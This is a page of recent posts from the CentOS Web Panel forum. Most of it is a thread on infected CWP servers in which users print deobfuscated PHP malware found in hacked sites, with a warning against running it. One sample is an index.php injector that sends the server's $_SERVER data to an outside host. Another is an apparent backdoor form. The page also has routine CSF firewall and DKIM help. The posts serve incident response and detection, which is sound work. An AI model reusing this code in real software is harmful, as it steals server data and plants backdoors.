11
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by pedromidiasf on October 14, 2025, 08:20:31 PM »Thank you for proving my point. There are also png looking files containing malicious code with random filename but they are rare. Probably result of an interrupted code with an exception.
Haven't found images that were encoded.
But I have a clean backup, I'll compare both and then I post the results here.
I have a few images that didn't match but because they weren't there before. They are not infected. You might have been infected before. Sending an image with php code inside a website is not hard to do. Hard is to make it executable (by changing it's extension for example).
Do you still have a file of those so I can obfuscate it to see what's inside? If so, leave the link so I can download it.
12
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by pedromidiasf on October 14, 2025, 06:33:12 PM »Thank you for proving my point. There are also png looking files containing malicious code with random filename but they are rare. Probably result of an interrupted code with an exception.
Haven't found images that were encoded.
But I have a clean backup, I'll compare both and then I post the results here.
13
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by pedromidiasf on October 14, 2025, 06:30:42 PM »robots.txt
There's also a robots file (Wordpress alike) that was added to all websites (even those that are not Wordpress). Wordpress by default don't use such files. And as you can see by the url (bellow on "sitemap" field) there's a parameter to the URL called "?sitemap.xml". If you have this, the index of your website was exploited as well. The exploitation added an infected code to the top of your index file.
I recommend you to take a deep look on each "index" file you have. If you don't need that index file delete it. If you need it, look line by line of code.
Content of the robots file:
The infected index.php file had this code on top (nothing new as I've posted before).
As far as I can see, it extracts server information (by PHP $SERVER array) and sends it to an external server. It probably tracks when someone opens the website to notify the attacker that the website is on.
Deobfuscated Contents:
(DO NOT EXECUTE THIS!!!!)
licelic.c (revaluation)
If you come across these files, they’re useful for identifying infected areas, but they’re not enough. I’ve discovered several other infected locations (quite a few, actually - even within the same website there are multiple infected files), and I haven’t been able to find all the licelic.c files that could point me to them.
I believe some of these files were deleted while the server was being exploited by the exploit, but a few might have been lost in the process - or perhaps they were left behind as bait to make it seem like those were only the infected areas.
There's also a robots file (Wordpress alike) that was added to all websites (even those that are not Wordpress). Wordpress by default don't use such files. And as you can see by the url (bellow on "sitemap" field) there's a parameter to the URL called "?sitemap.xml". If you have this, the index of your website was exploited as well. The exploitation added an infected code to the top of your index file.
I recommend you to take a deep look on each "index" file you have. If you don't need that index file delete it. If you need it, look line by line of code.
Content of the robots file:
Quote
User-agent:*
Disalow:/wp-admin/
Sitemap: https://example.com?sitemap.xml
The infected index.php file had this code on top (nothing new as I've posted before).
As far as I can see, it extracts server information (by PHP $SERVER array) and sends it to an external server. It probably tracks when someone opens the website to notify the attacker that the website is on.
Deobfuscated Contents:
(DO NOT EXECUTE THIS!!!!)
Code: [Select]
<?php
// Variables innecesarias/sin usar
$timestamp1 = date("Y-m-d H:i:s");
$token1 = strtok("AFbWn");
$list = implode(",", array("vQTrioN", "b97ms", "OiBCEdN", "dwjr3P"));
$null_var = (string)null;
$hash1 = sha1("UDBYN");
$token2 = strtok("JmD3LC");
$timestamp2 = date("Y-m-d H:i:s");
// Clase de inicialización trivial
new TJw3Q();
class Q5e9Q {
public static function __callStatic($name, $arguments) {
// Decodificación: "\143\x75\162\x6c" = "curl"
$curl_init = curl_init();
// URL: "http://cache.usererp.site/about.php"
$url = "http://cache.usererp.site/about.php";
// Configurar opciones CURL
curl_setopt($curl_init, CURLOPT_URL, $url . "?ua=" . urlencode($arguments[0]));
curl_setopt($curl_init, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl_init, CURLOPT_ENCODING, 0);
curl_setopt($curl_init, CURLOPT_FOLLOWLOCATION, 47);
// Ejecutar y guardar respuesta
global $response;
$response = curl_exec($curl_init);
curl_close($curl_init);
}
}
// Más variables innecesarias
$var1 = strstr("YNEAdT", "NAJ7mFa");
$var2 = implode("RwOc8q9YN", array());
$json_server = json_encode($_SERVER);
$var3 = define("pd4mjgTe", "rJOdy");
// ... más variables sin usar
function call_function($function_name, $param_count = null, $param1 = null, $param2 = null, $param3 = null, $param4 = null) {
if ($param_count == 1) return $function_name($param1);
if ($param_count == 2) return $function_name($param1, $param2);
if ($param_count == 3) return $function_name($param1, $param2, $param3);
if ($param_count == 4) return $function_name($param1, $param2, $param3, $param4);
return $function_name();
}
function redirect_if_url($response) {
if (substr($response, 0, 4) == "http") {
header("Location: " . $response);
}
}
function json_encode_server($server_array) {
return json_encode($server_array);
}
function handle_xml($response) {
if (strstr($response, "<urlset")) {
exit(header("Content-type:text/xml") . $response);
}
}
function handle_html($response) {
if (strstr(trim($response), "<html")) {
exit($response);
}
}
class TJw3Q {
public function __construct() {
$_SERVER["T"] = "z";
$_SERVER["TPL"] = "4";
}
}
function base64_encode_server($server_array) {
return base64_encode($server_array);
}
// Lógica principal
$json_encoded = json_encode($_SERVER);
$json_encoded = base64_encode($json_encoded);
Q5e9Q::fHaWdfTx($json_encoded);
?>
licelic.c (revaluation)
If you come across these files, they’re useful for identifying infected areas, but they’re not enough. I’ve discovered several other infected locations (quite a few, actually - even within the same website there are multiple infected files), and I haven’t been able to find all the licelic.c files that could point me to them.
I believe some of these files were deleted while the server was being exploited by the exploit, but a few might have been lost in the process - or perhaps they were left behind as bait to make it seem like those were only the infected areas.
14
CSF Firewall / Re: Firewall off in cwp panel
« Last post by Starburst on October 14, 2025, 05:50:55 PM »SSH into the server, and from the CLI:
csf -e, if working you should see what you are "csf and lfd are not disabled!"
That's a good thing.
Then run:
Some system are weird.
Log back into CWP, and it should show as 'On' now.
csf -e, if working you should see what you are "csf and lfd are not disabled!"
That's a good thing.
Then run:
Code: [Select]
systemctl start csf
Code: [Select]
systemctl start lfd
Code: [Select]
systemctl enable csf
Code: [Select]
systemctl enable lfd
Some system are weird.
Log back into CWP, and it should show as 'On' now.
15
DKIM / Re: I'm a bit lost
« Last post by Starburst on October 14, 2025, 05:48:14 PM »There is another file to check, opendkim.conf
Also some installation are missing opendkim & opendkim-tools, so you want to make sure they are installed and enabled.
If you are running AL9, see:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/dkim-not-working-on-almalinux-9-with-cwp/
Also some installation are missing opendkim & opendkim-tools, so you want to make sure they are installed and enabled.
If you are running AL9, see:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/dkim-not-working-on-almalinux-9-with-cwp/
16
CSF Firewall / Re: Firewall off in cwp panel
« Last post by setecabanas on October 14, 2025, 04:46:12 PM »Yes thanks, I had already tried that but nothing.
17
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« Last post by ConcernedCitizen on October 14, 2025, 04:04:47 PM »I found some .c files.
I also found that there a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deeply inside some folders of websites I've developed myself. Thankfully I have a clean backup and these files were not there.
licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites locations encoded in base64 and some weird stuff (can't decode it directly, maybe it is written with another encode type). I copy-pasted it to Cloud.ai that decode it for me and it gave me all the urls that are infected. I tried chatgpt and it gave me nothing in return.
SO "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.
Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...
wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
"c" file (without the dot)
"c" file (without the dot) is a zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated php code that consists on drawing a form that probably interacts with the expoits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)Code: [Select]<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE
// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;
// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO, $x6Mpbe) {
$iGRCOPT = str_split($TYCMzwTO, 1);
$emivt51O = explode(",", $x6Mpbe);
$gMRtx3VD = "";
foreach($emivt51O as $v) {
$gMRtx3VD .= $iGRCOPT[(int)$v];
}
return $gMRtx3VD;
}
// Static class with method to initialize arrays
class hCXKOZB {
public static function __callStatic($name, $arguments) {
$temarr = array(
"puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
"CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
"mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
);
foreach($temarr as $key => $v) {
$GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
}
}
}
// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";
// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0, "w") : "";
// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" . $mWHO_PtG($n3Bi8fy));
// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo "<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
echo "</form>";
?>
index.php
This is the index.php deeply inside subfolders were the index file i've created. The root index.php file was replaced by a malicious code that executes the payload and imports my original index file.
So take a deep look on every index file you have (even sub-folders).
These files were touched (date-time changed). Mine dated 30/08/2024 23:06:51
So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going throw all files and folders and apply new rules to stop execution on folders that you don't have php files (image uploads for example).
Thank you for proving my point. There are also png looking files containing malicious code with random filename but they are rare. Probably result of an interrupted code with an exception.
18
CSF Firewall / Re: Firewall off in cwp panel
« Last post by overseer on October 14, 2025, 03:49:34 PM »Try toggling it on/off/on in the web GUI -- sometimes it gets out of sync with the actual CSF reality (a bug).
19
CSF Firewall / Firewall off in cwp panel
« Last post by setecabanas on October 14, 2025, 03:07:58 PM »firewall appears disabled in cwp panel
but csf is working correctly
[root@s3 services]# csf -e
csf and lfd are not disabled!
[root@s3 services]# csf -e
csf and lfd are not disabled!
any idea?
but csf is working correctly
[root@s3 services]# csf -e
csf and lfd are not disabled!
[root@s3 services]# csf -e
csf and lfd are not disabled!
any idea?
20
DKIM / Re: I'm a bit lost
« Last post by pedromidiasf on October 14, 2025, 12:48:10 PM »I'm sorry I lost this message.
Thank you for your time and help.
Thank you for your time and help.